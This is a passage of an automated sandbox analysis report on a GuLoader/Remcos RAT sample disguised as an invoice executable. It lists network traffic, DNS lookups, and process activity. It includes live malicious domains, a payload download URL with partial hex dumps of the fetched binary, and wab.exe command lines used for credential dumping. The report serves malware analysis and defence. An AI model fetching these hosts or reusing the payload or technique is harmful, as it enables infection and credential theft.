                                                                                                                                                                                                                    Oct 31, 2023 13:27:12.941951036 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:27:12.947561026 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:27:13.231059074 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:27:43.603663921 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:27:43.653831959 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:27:43.655474901 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:27:43.949686050 CET24025007794.156.6.253192.168.11.20

                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Oct 31, 2023 13:19:56.488696098 CET6157653192.168.11.201.1.1.1
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.490148067 CET53615761.1.1.1192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.490875006 CET6157653192.168.11.209.9.9.9
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.620471954 CET53615769.9.9.9192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.230863094 CET5400453192.168.11.201.1.1.1
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.407125950 CET53540041.1.1.1192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.157284975 CET6441253192.168.11.201.1.1.1
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.308345079 CET53644121.1.1.1192.168.11.20

                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Oct 31, 2023 13:19:56.488696098 CET192.168.11.201.1.1.10x3016Standard query (0)gudanidevelopment.geA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.490875006 CET192.168.11.209.9.9.90x3016Standard query (0)gudanidevelopment.geA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.230863094 CET192.168.11.201.1.1.10x5e12Standard query (0)ourt2949aslumes9.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.157284975 CET192.168.11.201.1.1.10xc409Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.490148067 CET1.1.1.1192.168.11.200x3016No error (0)gudanidevelopment.ge217.147.225.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.620471954 CET9.9.9.9192.168.11.200x3016Name error (3)gudanidevelopment.genonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.407125950 CET1.1.1.1192.168.11.200x5e12Name error (3)ourt2949aslumes9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.308345079 CET1.1.1.1192.168.11.200xc409No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                    • gudanidevelopment.ge
                                                                                                                                                                                                                    • geoplugin.net

                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    0192.168.11.2050076217.147.225.6980C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.803142071 CET8OUTGET /IogvoayYhe139.bin HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                    Host: gudanidevelopment.ge
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.107784033 CET9INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 31 Oct 2023 12:19:57 GMT
                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                    Last-Modified: Thu, 26 Oct 2023 08:16:56 GMT
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 494656
                                                                                                                                                                                                                    Cache-Control: s-maxage=10
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Data Raw: 58 bc 9a 79 03 af 7f af 05 ca 76 8e 7b aa 66 c3 7b 56 3a 03 c8 ff 2a 61 e6 69 58 3a c9 e6 54 f5 ab f0 61 e6 74 59 53 7f c4 22 b6 05 f3 13 de 2b f3 df 32 a6 1d 7c 4f 02 49 39 5d 98 f1 78 4d 31 6a 70 23 2f a7 76 a0 17 65 98 e4 ed 74 81 9b 8f d0 af dd 9a eb 62 67 78 eb 6f d5 6c 87 c1 d6 b4 02 69 2a 73 04 45 b3 35 c5 95 40 72 44 ec 4c 49 a6 ec 5d 73 34 b8 37 e9 a1 88 ae ba 71 be b0 de 83 34 1a 3e 2c c7 69 eb c5 73 c6 bd 21 d5 65 08 5a 98 c8 83 7f 96 84 d7 f5 02 ff ff a9 49 94 fa 3e 18 bb 3f 4c e9 45 a0 c8 7b aa cb 70 7a c8 8a 15 09 5b 14 46 33 81 5f 8f 05 dc 68 7d 0a c8 68 68 42 e2 e3 ca 70 26 3b 0b 4e 49 d2 86 5f 01 b8 4b 72 ef 27 b1 ca 49 02 ef df a0 29 fb 90 60 3f 81 32 52 19 5e 77 4a 55 8e cf ad e0 22 8f a2 6d ce 89 d1 22 1f b5 88 dc 8d ff 42 8f d8 04 b0 d3 e8 13 bc 63 b7 b2 cf 72 e5 8a ac 7c 65 ab 97 c1 a0 64 b4 8f 21 05 52 74 d2 87 f8 94 ad 1f 94 46 3c f5 3a be 76 07 2c 59 c2 1a 5d d0 86 83 d6 8d 97 bd 98 f6 ff bc 29 c3 99 9d 1d 31 31 ea 9a c9 21 2f 7c 0a b9 40 5d b6 13 fe 06 4d 06 46 df 34 46 5f 02 db 3c 19 8b ee e0 41 50 bf c9 aa 41 04 40 33 e1 23 bb f9 d7 85 5c 9c 6f 28 26 f9 30 0d e2 ca 65 58 df 25 51 32 0d 34 33 7c 80 6e 89 46 d6 39 ea 7f 59 cb 4d 46 cc 87 c2 32 70 21 bf 10 9c fa 1c d4 5f 90 32 9e fa fd c4 02 07 36 bf a3 e0 aa 29 79 57 0b cf b6 fd 2b e4 6e 8f d6 9e 6e 07 f6 44 90 7f 2f 3c ee 3e 41 ca 5a 41 b4 b7 dc 61 56 8f 54 e3 a8 a6 9c 9a dc 0a 66 66 49 af 18 61 34 87 a5 00 cd f3 73 40 dd 9b 13 11 73 4b f2 17 23 bf 78 d4 f5 6b 18 6d 4f 7d 4e 9e e3 3e dc 0d a8 32 84 6d d8 98 05 25 a4 58 55 83 b9 61 5f 67 86 55 59 ed fa 80 62 86 36 b3 71 6c 02 00 d1 78 42 0a 59 55 74 3e fd 19 98 5f 44 be d3 51 c6 e2 5f e0 69 34 a7 96 11 10 01 e9 b1 1a 78 b3 f8 02 36 3b 5f 20 80 44 af 0f 9a 3c c0 94 27 91 93 1e 15 ed 77 50 d4 90 79 e8 13 96 cd a1 32 72 51 7b bb b2 5c b3 b6 f8 df e9 6e 11 7b dc 3e 4e 39 ad 4f e4 21 0c 1e e5 37 64 95 ff bc 49 eb 98 aa e5 07 31 58 98 c0 76 61 36 17 69 54 21 73 84 ce 14 3d 3a e0 ac 76 8b 98 4f 3b 60 e8 c1 bc 5e c3 11 6b 04 16 69 27 bd 31 43 97 e7 a2 17 c2 d9 db 79 0c b9 d5 9b 49 4a 32 83 80 77 b0 a1 dd 73 3d 02 14 c4 89 c9 52 1e 4c 92 70 3d d5 50 bd ea 79 cc 5a 19 05 89 ee c0 b2 ca fe a1 d7 dc dc 1c f4 d4 79 ac a8 9b cc f0 51 51 e4 3d 2b 8d 04 e3 ac 83 1e f8 77 9c 3f f8 5f 34 d2 82 2a e2 08 b8 b0 e0 88 4d 42 48 0b 26 69 94 ee 87 f5 f3 bc c4 8e 6b 34 5f 27 b6 d4 fd 49 9c 9c e8 33 25 e7 ba 57 e4 c6 83 bb 03 6c 67 07 1c 7d 63 63 ce 3a ac 24 83 99 ed db 79 8d fb c5 6b f2 e5 4c 60 43 0c 55 56 0c 93 96 ac 0b ea 37 01 cf 22 5f ef c0 b4 85 25 3c 27 10 19 35 c0 32 f0 1a 08 28 17 71 76 be 81 2c 0b 04 b2 f9 55 18 e2 7d 9a 9b a0 3f 7b eb ad 83 d5 30 b9 cf a9 6f 03 ec 5c 2a a9 e4 af e5 41 cf 36 c9 53 36 cb a4 e6 64 dc de 76 0f 0d ae 30 2c 6b 21 14 96 2c 8c 82 78 eb 51 b3 3c ab cb 14 e5 08 14 6c f5 ac 61 82 54 48 bf f5 d7 4c 4e 21 19 9d 21 bd 17 0d 11 80 e9 fd 89 d8 80 77 a0 ae 08 44 a0 6e a4 c8 3a c2 6d ab 7a 48 e0 48 46 2a 8a 2f fa b2 e9 20 a0 5d 96 2f 23 fa df cb 07 83 93 0e ce 6e 33 73 47 30 7b 76 0c 7a 5f 24 42 90 84 32 08 5e 36 d3 63 7b 38 e8 a5 ce d5 cc c6 de f9 ab e1 58 14 e3 c2 40 c2 03 6e 56 18 f1 4c a5 63 22 83 0c 36 d8 2f 97 03 29 d5 b6 a0 b0 13 6e 03 2e c1 aa ff ec 9a 4e 8c 4b 53 ed 26
                                                                                                                                                                                                                    Data Ascii: Xyv{f{V:*aiX:TatYS"+2|OI9]xM1jp#/vetbgxoli*sE5@rDLI]s47q4>,is!eZI>?LE{pz[F3_h}hhBp&;NI_Kr'I)`?2R^wJU"m"Bcr|ed!RtF<:v,Y])11!/|@]MF4F_<APA@3#\o(&0eX%Q243|nF9YMF2p!_26)yW+nnD/<>AZAaVTffIa4s@sK#xkmO}N>2m%XUa_gUYb6qlxBYUt>_DQ_i4x6;_ D<'wPy2rQ{\n{>N9O!7dI1Xva6iT!s=:vO;`^ki'1CyIJ2ws=RLp=PyZyQQ=+w?_4*MBH&ik4_'I3%Wlg}cc:$ykL`CUV7"_%<'52(qv,U}?{0o\*A6S6dv0,k!,xQ<laTHLN!!wDn:mzHHF*/ ]/#n3sG0{vz_$B2^6c{8X@nVLc"6/)n.NKS&
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.107846022 CET11INData Raw: 66 ae eb 59 4a ae a6 0b c8 e5 25 6c 01 5c b6 b4 b9 c5 30 10 4f 66 1a e6 84 cd c9 64 04 7e 68 d6 37 22 e2 ee 16 5d 77 1c 22 b5 2b 54 42 c3 ee 1a 1c cc db fc 1e 91 93 e9 53 1e 52 29 57 a0 10 57 ea d9 9f cf 0c 58 c3 46 c0 e7 cf 11 ec ba cf ca 98 e0
                                                                                                                                                                                                                    Data Ascii: fYJ%l\0Ofd~h7"]w"+TBSR)WWXFSXyb4MZq>0+ye$sE#149QYUEo9&0(nWI_z)v2#_2D<2L@ai9h2<}{$0a"_R:1q:+
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.107980013 CET12INData Raw: d5 2c 18 85 9d 47 4d 26 b0 ad 5c 08 7b dc 48 64 db 98 5c e6 cc c5 d5 c6 b9 89 9f 56 85 55 00 2e 92 27 e2 17 e5 5d c5 45 01 00 88 c3 f9 bd d9 50 74 d6 55 28 9b 5f 1d 7d 6a 81 e7 a5 cf 0d 91 f4 a0 96 79 ab 81 ac b1 f2 ea 82 fb 02 6f f8 93 ec 4c 88
                                                                                                                                                                                                                    Data Ascii: ,GM&\{Hd\VU.']EPtU(_}jyoLcVX]_+(P)^VV]_1<*U_=iR;-j[=\||+,p)6!k3k*PU(,x6uS$)SNy*pI>M$$va8A""o_<X/
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108088017 CET13INData Raw: f4 53 a9 bf a8 2e b4 60 17 2d 48 59 92 f8 bf 94 2d 3d ec 3f ee 65 8b 8c 07 55 ed af 5b 90 ea 80 47 85 31 f5 b6 99 5e b1 cb 20 5f 77 e6 66 81 2f af 76 91 86 4d fc b4 44 25 2c b3 35 90 30 e9 80 eb 84 05 03 4f 26 48 af f7 ca d0 54 0c 2e 02 25 af c9
                                                                                                                                                                                                                    Data Ascii: S.`-HY-=?eU[G1^ _wf/vMD%,50O&HT.%F6{8CxM)1d|[m9^PrAxR)Z!QG/0vn7h`<Cl45#h}]sP4`1&3<(bpbL9,Kc/i
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108251095 CET15INData Raw: 1c 34 f9 6a 6c d1 16 f1 ac 20 0c aa c3 86 2e f9 bb 54 21 04 24 1e fb 48 8c 9b 89 6d 5b 21 d0 3d d9 c5 00 60 57 ce df 8a 6e 63 79 81 7d 32 7a 02 6f 97 f6 c2 32 b5 e7 03 cd 7b b6 51 c2 9e 80 6b 94 92 46 fc f3 94 ce b8 7e 91 94 50 9e c1 9e 26 7b 5c
                                                                                                                                                                                                                    Data Ascii: 4jl .T!$Hm[!=`Wncy}2zo2{QkF~P&{\b'<>[Tbwu}>r!1{anvE%-8Skx(zGVzRb!^5d!xfTRa23`1&zG>]`1}[Z0pBw}vo|)<{d0{<
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108309031 CET16INData Raw: 6d e1 10 05 15 f7 db eb 49 1e f4 fc 9e 07 94 4f 3b 39 b8 d4 54 5d 71 c0 f0 e6 a6 04 ac be ba b9 8a b7 5d 63 f6 ca 33 8b ff 46 2a 10 71 a4 4d 80 80 77 ed fa 56 bd d5 58 17 c4 89 76 26 3a 80 37 ca 96 a6 5f bd ea 79 2d 4d 1c 05 89 c0 05 ba ca 14 e1
                                                                                                                                                                                                                    Data Ascii: mIO;9T]q]c3F*qMwVXv&:7_y-M"/'Ys+o5 WlNsw[1f}>_ejE3u013|ffUk\((khas}-$_8b{qv;*9?ox"
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108365059 CET17INData Raw: ac d4 4c d0 9d 46 d3 04 ea 57 0c df 72 81 64 04 a7 50 ed cc 03 fb 64 78 ab 84 e7 ec fb e5 c6 b4 76 76 a9 8d 14 36 a9 be 0a 7d 53 8b bb 13 c7 86 2d ec 66 83 3b fa f1 b9 cb 89 46 29 83 40 4f 35 81 ae 56 45 26 25 eb e9 0c db c7 f1 ec 71 c7 3f 3c 7e
                                                                                                                                                                                                                    Data Ascii: LFWrdPdxvv6}S-f;F)@O5VE&%q?<~(M crqyn1dEIdb#qN#~51^_*\iX&9knJBP\%a`g+ESRs`AoDQi<LY$(mmrVPX=U
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108647108 CET19INData Raw: db 2a 49 a5 e9 17 80 12 3d 74 a2 bf b4 0c c9 96 45 0c b7 c8 89 20 1d c1 0d cf be b4 88 f5 55 59 0f 9b c0 a5 6c 2a 45 d6 e7 fb 07 b3 cf 9b d9 b4 b1 45 30 7b 8b 50 83 ea 87 e5 32 cf 39 46 8d d8 67 09 bb 7d 12 27 9e 2f a1 06 c7 ed c1 7b 05 b6 e8 a6
                                                                                                                                                                                                                    Data Ascii: *I=tE UYl*EE0{P29Fg}'/{g+Z9rdtjygz8dA`*QCB/$Gz{KXZz]hf3B)Y@U;I}t =ML4u-t_ZCDE%_^d8Rd
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108712912 CET20INData Raw: 18 45 07 35 c0 8b 53 8e fc 60 07 4c ba ad 8b 71 c8 54 db 68 a6 60 9e 69 dd 76 88 7f 1a 67 4c 20 43 5c 98 35 6e 1e 93 c3 68 ea 67 34 b1 2a 0f 62 6d bf 6d 44 00 27 10 49 e8 82 ce 7b d4 58 c0 66 80 89 41 d1 a1 46 0c 1a b5 55 5a e2 2d 11 55 48 e7 78
                                                                                                                                                                                                                    Data Ascii: E5S`LqTh`ivgL C\5nhg4*bmmD'I{XfAFUZ-UHxn2*6Peg!2$l7CQhO%+< ,G}@PHV(!BsG_Iuq|m~i[7|l%6g-x^C6[68^='v
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108767986 CET22INData Raw: 7d 33 d8 58 67 ba 45 07 94 61 6b be ea d7 b1 6b 33 72 eb 0f 87 c6 32 76 1f 9f 88 ec 73 97 e7 40 6d a7 83 7f ff a4 17 34 ee 75 ab f8 8d ad 9d e3 52 17 91 ca 35 70 26 c1 77 51 c9 71 61 b3 02 0e e7 33 d4 5c a5 17 2c 61 41 0c 6d c8 56 ae 6d 9d 16 e5
                                                                                                                                                                                                                    Data Ascii: }3XgEakk3r2vs@m4uR5p&wQqa3\,aAmVmrks$FmkU5yP?Z1//q1Xv0E:u\zaM^ZZ<G9*P%eq&<5>{3f9a>o%ere]H#b@
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411365986 CET23INData Raw: 59 f7 86 e2 f2 48 a3 f4 ed 66 4f 57 ad ee e6 23 21 ef 33 9e 8c 28 4e 0b dd 59 46 9a 10 20 12 f2 72 7d b5 67 0d 84 03 d9 7b 79 9a 81 a2 d6 07 e2 c6 77 4c e3 01 55 b1 5b 98 12 63 4a 48 d4 55 28 7e 22 8c fc 54 b5 87 fb 52 b5 f4 63 44 3a ac ef fa fa
                                                                                                                                                                                                                    Data Ascii: YHfOW#!3(NYF r}g{ywLU[cJHU(~"TRcD:A9!w}?_nmG?-Rb+LUimI}1" aoXMz!\pMR281pqS3H#s'owm/8H)BF~9=!X Y


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    1192.168.11.2050079178.237.33.5080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.559552908 CET534OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.818048000 CET540INHTTP/1.1 200 OK
                                                                                                                                                                                                                    date: Tue, 31 Oct 2023 12:20:01 GMT
                                                                                                                                                                                                                    server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    content-length: 958
                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 32 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"102.129.153.223", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:13:19:36
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    File size:1'091'672 bytes
                                                                                                                                                                                                                    MD5 hash:195787F942427352DB785FEA42C93F43
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000003.00000002.40188235622.0000000000690000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.40189422367.0000000003F89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:13:19:44
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:13:20:02
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                    Start time:13:20:02
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:13:20:02
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
